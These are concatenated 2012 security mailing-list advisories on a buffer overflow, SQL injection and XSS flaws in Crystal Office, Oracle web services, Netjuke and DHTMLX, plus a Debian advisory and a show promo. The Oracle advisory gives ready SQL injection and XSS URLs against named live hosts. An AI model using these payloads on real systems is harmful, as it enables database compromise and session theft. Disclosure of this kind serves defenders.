Title: == Crystal Office Suite v1.43 - Buffer Overflow Vulnerability Date: = 2012-04-12 References: === http://www.vulnerability-lab.com/get_content.php?id=489 VL-ID: = 489 Introduction: = Crystal Office is the essential office suite ideal for home and business users, delivering more tools that make your work go faster and your life go easier. Find all the essential office software to complete routine tasks faster and with better results. Create and edit text and graphics in letters, reports, documents and Web pages. Perform calculation and manage lists in spreadsheets. Keep track of appointments and tasks. Open, edit and save Microsoft® Office documents. Whats Included: • NotePro - feature-packed easy to use word processor. Create polished documents of any length or type, including reports, letters, resumes and brochures. Manage standard text files, Rich Text Format, Word, and HTML. • DayMate - a versatile intuitive day planner. Use DayMate to create and schedule reminders that can pop up messages, start applications or open documents, check for new e-mail, dial phone numbers, send messages, and open a specified Web sites. • CellPro - a powerful and easy-to-use spreadsheet application. Use CellPro to create budgets, invoices, receipts and expense reports. Organize, analyze and manage important data and financial information. Open and save Microsoft Excel files. • ChartPro - a project management software application that is used to create and display projects using a Work Breakdown Structure (WBS) chart. A WBS chart displays the structure of a project showing how a project is organized into summary and detail levels. Using a WBS chart is a more intuitive approach to planning and displaying a project. • Clip Plus - the award-winning Windows Clipboard enhancer. It works alongside the regular clipboard and automatically grabs and saves text, images, and objects as they are copied to the clipboard - making them available for saving, reuse, and printing. (Copy of the Vendor Homepage: http://www.crystaloffice.com ) Abstract: = A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Crystal Office Suite v1.43. Report-Timeline: 2012-04-02: Vendor Notification 1 2012-04-08: Vendor Notification 2 2012-04-09: Vendor Response/Feedback 2012-04-12: Public or Non-Public Disclosure Status: Published Affected Products: == Cristal Office Systems Product: Office Suite, CellPro, ChartPro, ClipPlus & NotePro v1.43, 1.23, 1.23, 1.43 & 3.88 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on Crystal Office Suite v1.43 (current version). Vulnerable are all included programs: CellPro, ChartPro, ClipPlus, NotePro. The vulnerability is located in each of the program executeables. An oversized string on the registry values Recent1, Recent2 etc. within the keys: [HKEY_CURRENT_USER/Software/Crystal Office/CellPro] [HKEY_CURRENT_USER/Software/Crystal Office/ChartPro] [HKEY_CURRENT_USER/Software/Crystal Office/ClipPlus] [HKEY_CURRENT_USER/Software/Crystal Office/NotePro] Results in a local buffer overflow. The value is read while opening the file menu. An attacker needs to manipulate the registry value and has to trick the victim to hover over the ReOpen menu item within the File menu. --- Debug Logs --- # Registers: EAX ECX 42424242 EDX 7C9132BC ntdll.7C9132BC EBX ESP 0012E4E8 EBP 0012E508 ESI EDI EIP 42424242 # Stack: 0012E4D8 7C929F68 ntdll.7C929F68 0012E4DC 01B4 0012E4E0 7C91D80A ntdll.7C91D80A 0012E4E4 7C9601E1 ntdll.7C9601E1 0012E4E8 7C9132A8 RETURN to ntdll.7C9132A8 <--ESP 0012E4EC 0012E5D0 0012E4F0 0012F900 ASCII C CCC 0012E4F4 0012E5EC 0012E4F8 0012E5A4 # Disassembly: 7C91329D FF75 0C PUSH DWORD PTR SS:[EBP+C] 7C9132A0 FF75 08 PUSH DWORD PTR SS:[EBP+8] 7C9132A3 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18] 7C9132A6 FFD1 CALL ECX 7C9132A8 64:8B25 MOV ESP,DWORD PTR FS:[0] 7C9132AF 64:8F05 POP DWORD PTR FS:[0] 7C9132B6 8BE5 MOV ESP,EBP 7C9132B8 5D POP EBP 7C9132B9 C2 1400 RETN 14 7C9132BC 8B4C24 04MOV ECX,DWORD PTR SS:[ESP+4] # Dump: 0012F8E8 41 41 41 41 41 41 41 41 0012F8F0 41 41 41 41 41 41 41 41 0012F8F8 41 41 41 41 41 41 41 41 0012F900 41 41 41 41 42 42 42 42 0012F908 43 43 43 43 43 43 43 43 0012F910 43 43 43 43 43 43 43 43 0012F918 43 43 43 43 43 43 43 43 Picture(s): ../1.png Proof of Concept: = The vul
[Full-disclosure] [SECURITY] [DSA 2449-1] sqlalchemy security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2449-1 secur...@debian.org http://www.debian.org/security/Nico Golde April 12, 2012 http://www.debian.org/security/faq - - Package: sqlalchemy Vulnerability : missing input sanitization Problem type : remote Debian-specific: no CVE ID : CVE-2012-0805 It was discovered that sqlalchemy, an SQL toolkit and object relational mapper for python, is not sanitizing input passed to the limit/offset keywords to select() as well as the value passed to select.limit()/offset(). This allows an attacker to perform SQL injection attacks against applications using sqlalchemy that do not implement their own filtering. For the stable distribution (squeeze), this problem has been fixed in version 0.6.3-3+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 0.6.7-1. For the unstable distribution (sid), this problem has been fixed in version 0.6.7-1. We recommend that you upgrade your sqlalchemy packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk+GZWIACgkQHYflSXNkfP+xvQCgocwOsYzLI+eh2slV+ma/k3HX hO8An0+oka75m0dk3tI9IRzatJ2/J2T0 =4efD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CRUNCH TV SHOW - Live Stream & Security Videos
Title: == CRUNCH TV SHOW - Live Stream & Security Videos Date: = 2012-04-11 References: === Download: http://www.vulnerability-lab.com/resources/videos/508.mov View: http://www.youtube.com/watch?v=G9ECcxvB0dQ VL-ID: = 508 Status: Published Exploitation-Technique: === TV Show Severity: = Critical Details: This is the new trailer for the new Crunch TV Security Show with startup in may 2012. The first moderator of the security tv show is the well known John Thomas Draper alias Captain Crunch. Co-moderator & researcher of the show is the well known exploiter Benjamin Kunz Mejri from Germany. Credits: John Thomas Draper (born 1943), also known as Captain Crunch, Crunch or Crunchman (after Cap`n Crunch, the mascot of a breakfast cereal), is an American computer programmer and former phone phreak. He is a legendary figure within the computer programming world. Draper is the son of a U.S. Air Force engineer; he described his father as distant in an interview published on the front page of the Jan 13–14, 2007 issue of The Wall Street Journal. Draper himself entered the Air Force in 1964, and while stationed in Alaska helped his fellow servicemen make free phone calls home by devising access to a local telephone switchboard. After Alaska, he was stationed at Charleston Air Force Station in Maine. In 1967, he created WKOS [W-\"chaos\"], a pirate station in nearby Dover-Foxcroft, but had to shut it down when a legitimate radio station, WDME, objected. He was honorably discharged from the Air Force in 1968 and did military-related work for several employers in the San Francisco Bay Area. He adopted the counterculture of the times and operated a pirate radio station out of a Volkswagen van. One oft-repeated story featuring Captain Crunch goes as follows: Draper picked up a public phone, then proceeded to “phreak” his call around the world. At no charge, he routed a call through different phone switches in countries such as Japan, Russia and England. Once he had set the call to go through dozens of countries, he dialed the number of the public phone next to him. A few minutes later, the phone next to him rang. Draper spoke into the first phone, and, after quite a few seconds, he heard his own voice very faintly on the other phone. He sometimes repeated this stunt at parties. Draper also claimed that he and a friend once placed a direct call to the White House during the Nixon administration, and after giving the operator President Nixon\'s secret code name of \"Olympus\", and asking to speak to the president about a national emergency, they were connected with someone who sounded like Richard Nixon; Draper’s friend told the man about a toilet paper shortage in Los Angeles, at which point the person on the other end of the line angrily asked them how they\'d managed to get connected to him. Draper was also a member of the Homebrew Computer Club. && Benjamin Kunz M.(28) is active as a penetration tester and security analyst for private and public security firms, hosting entities, banks, isp(telecom) and ips. His specialties are security checks(penetrationtests) on services, software, applications, malware analysis, underground economy, government protection or cyberwar analysis, reverse engineering, lectures or presentations and workshops about IT Security. During his work as a penetration tester and vulnerability researcher, many open- or closed source applications, software and services were formed more secure. In 1997, Benjamin K.M. founded a non-commercial and independent security research group called, Global Evolution - Security Research Group which is still active today. From 2010 to 2011, Benjamin M. and Pim C. (Research Team) identified over 300 zero day vulnerabilities in well known products from companies such as DELL, Barracuda, Mozilla, Kaspersky, McAfee, Google, Fortigate, Opera, Cyberoam, Safari, Endian, Skype, Asterisk, Astaro, PBX & SonicWall. In 2010 he founded the company Evolution Security. After the firm`s establishment arose the Vulnerability Lab as the legal european initiative for vulnerability researchers, analysts, penetration testers, and serious hacker groups. Ben is also the leader of the Contest + VLab Research Team. He have a lot of stable references by solved events, interviews or contests/wargames like ePost SecCup, SCS2, 27c3, EH2008, Har2009, Da-op3n & he provids exclusive zero-day exploitation sessions/releases. Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
[Full-disclosure] Oracle Service Applications - SQL Injection Vulnerabilities
Title: == Oracle Service Applications - SQL Injection Vulnerabilities Date: = 2012-04-12 References: === http://www.vulnerability-lab.com/get_content.php?id=478 VL-ID: = 478 Introduction: = Oracle Corporation (NASDAQ: ORCL) is an American multinational computer technology corporation that specializes in developing and marketing computer hardware systems and enterprise software products – particularly database management systems. Headquartered at 500 Oracle Parkway, Redwood Shores, Redwood City, California, United States and employing approximately 111,298 people worldwide as of 30 November 2011, it has enlarged its share of the software market through organic growth and through a number of high-profile acquisitions. By 2007 Oracle had the third-largest software revenue, after Microsoft and IBM. The company also builds tools for database development and systems of middle-tier software, enterprise resource planning software (ERP), customer relationship management software (CRM) and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle Corporation, has served as Oracle s CEO throughout its history. He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008 the Associated Press ranked Ellison as the top-paid chief executive in the world. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation ) Abstract: = A Vulnerability Laboratory Researcher discovered multiple blind SQL Injection Vulnerabilities on Oracles official service application. Report-Timeline: 2012-03-28: Vendor Notification 2012-03-29: Vendor Response/Feedback 2012-04-11: Vendor Fix/Patch 2012-04-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple remote SQL Injection vulnerabilities are detected on on Oracles official service application(Web-Servers). The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms, service & application compromise. The vulnerabilities are located on the shop, campus, education & academy service of oracle. Vulnerable Module(s): [+] emea1-events-remove3 [+] cn-profile-oardc.jsp?flag= [+] us-jobdesc.jsp [+] cn-profile-add-oardc.jsp Affected Service(s): [+] https://campus.oracle.com [+] http://education.oracle.com [+] https://academy.oracle.com [+] https://shop.oracle.com Picture(s): ../1.png ../2.png ../3.png ../4.png Proof of Concept: = The sql injection vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... https://campus.oracle.com/campus/HR/emea1-events-remove3.jsp?select1='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' https://campus.oracle.com/campus/HR/us-jobdesc.jsp?select2='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Submit=Go https://academy.oracle.com/pls/html/wwv_flow.show post data f01=false&f02=ASC&p_flow_id=300&p_flow_step_id=2&p_instance=3793763020344869&p_request=APXWGT&p_ widget_action=COLUMN_ORDER&p_widget_mod=ACTION&p_widget_name=worksheet&x01=1%27%22&x02=9823900149811628 XSS https://campus.oracle.com/campus/HR/cn-profile-direct.jsp?flag='"-->alert(/Vulnerable/) Few Sql queries that can be seen in source page : SELECT class_id,doc_code,to_char(class_date,NVL(wc.date_format,'DD-MON- ')) dates, seats_avail, cl.city, cl.state, customer_sat_flag, deep_link_info, ed_center_id, cl.location_id, cl.location_code,loc_type, spoken_language, course_id, activity_version_id ,class_start_time,class_end_time, class_duration,oat.translation_ attributes audiencetype_attributes, cl.timezone timezone, cl.parent_org_id, cl.territory_code FROM LQ_CLASS_SEARCH cl,OTA_ AUDIENCE_TYPES oat, WDDI_COUNTRY wc ,MAP_URLS mu WHERE doc_code = ( SELECT easi_code FROM COURSES WHERE ID = 'D6
[Full-disclosure] Netjuke 1.0 RC1 - SQL Injection Vulnerabilities
Title: == Netjuke 1.0 RC1 - SQL Injection Vulnerabilities Date: = 2012-04-12 References: === http://www.vulnerability-lab.com/get_content.php?id=506 VL-ID: = 506 Introduction: = The Netjuke is a Web-Based Audio Streaming Jukebox powered by PHP 4, a database and all the MP3, Ogg Vorbis and other format files that constitute your digital music collection. Supports images, language packs, multi-level security, random playlists ... ( Copy of the Vendor Website: http://sourceforge.net/projects/netjuke ) Abstract: = A Vulnerability Laboratory Research Team discovered multiple SQL Injection Vulnerabilities on Netjuke v1.0 RC1. Report-Timeline: 2012-04-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A remote SQL Injection vulnerability is detected on Netjukes v1.0 RC1 Content Management System. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. The vulnerability is located on the search module of the web application. Vulnerable Module(s): [+] search.php Proof of Concept: = The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://127.0.0.1/netjuke/search.php?do=list.tracks&col=[SQL-Injection] http://127.0.0.1/netjuke/search.php?do=search.adv&clause=KCB1cHBlcih0ci5uYW1lKSBsaWtlICclPFNDUklQVD5BTEVSVCgxKTwvU0NSSVBUPiUnICk%3D&sort=al&filter=[SQL-Injection] http://127.0.0.1/netjuke/search.php?do=search&col=ge.name&val=[SQL-Injection] http://127.0.0.1/netjuke/search.php?do=list.tracks&col=ar_id&val=325&sort=al&filter=al_id=[SQL-Injection] Risk: = The security risk of the remote sql injection vulnerabilities are estimated as high(+). Credits: Vulnerability Laboratory Researcher - snup (s...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012 Vulnerability-Lab -- VULNERABILITY RESEARCH LABORATORY TEAM Website: www.vulnerability-lab.com Mail: resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DHTMLX Suite v.3.0 - Multiple Web Vulnerabilities
Title: == DHTMLX Suite v.3.0 - Multiple Web Vulnerabilities Date: = 2012-04-11 References: === http://www.vulnerability-lab.com/get_content.php?id=507 VL-ID: = 507 Introduction: = To demonstrate the rich possibilities of DHTMLX controls and to show how they work within a common user interface, we’ve created some demo applications which are listed below. Using dhtmlxLayout, dhtmlxGrid, dhtmlxTree, and other dhtmlx components, you can very quickly create your own web applications with similar user interfaces. Ajax Application Built with DHTMLX - Database Administrator Database Administrator This application provides database management/navigation functionality and demonstrates simultaneous usage of the following DHTMLX components: - dhtmlxLayout - dhtmlxTree - dhtmlxToolbar - dhtmlxWindows - dhtmlxGrid - dhtmlxTabbar (Copy of the Vendor Homepage: http://dhtmlx.com/docs/products/dhtmlxSuite/index.shtml ) Abstract: = The Vulnerability Laboratory Team discovered multiple Vulnerabilities in the DHTMLX v.3.0 Professional|Standard Edition. Report-Timeline: 2012-04-10: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A remote SQL Injection vulnerability is detected in the DHTMLX v.3.0 Professional|Standard Edition. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. the vulnerability is located on the sql query module of the database administrator function which allows to inject via POST request the database tables. Vulnerable Module(s): [+] SQL Query - Command Module --- SQL Exception Logs --- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version from the right syntax to use near `1-` at line 1 Picture(s): ../1.png 1.2 Multiple persistent input validation vulnerability are detected in the DHTMLX v.3.0 Professional|Standard Edition. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. Vulnerable Module(s): [+] Register Form - Input Fields & Login Username Display [+] Contacts Us - Send Input Fields & Admin output Display [+] Add Groups Name - Control Panel Picture(s): ../2.png ../3.png Proof of Concept: = 1.1 The sql injection vulnerability ca be exploited by local privileged users of the application dbms. For demonstration or reproduce ... id=host%5E0%7Cdb%5EdhtmlxKING-LUI%7Ctable%5Edepartments&sql=-1'%0A[SQL-INJECTION] [SQL-Query] 1.2 The persistent input validation vulnerabilities can be exploited by local low privileged user account with low required user inter action. For demonstration or reproduce ... ADD URL: http://dhtmlx.com/docs/products/demoApps/dhtmlxDBAdmin/connection.html?etc=1333992780435 Vulnerable: Input Servername & Username - Listing db2.dhtmlx.com ko >"http://google.com";> Connection error http://www.vulnerability-lab.com";> Risk: = 1.1 The security risk of the sql injection vulnerability via POST is estimated as high(-). 1.2 The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.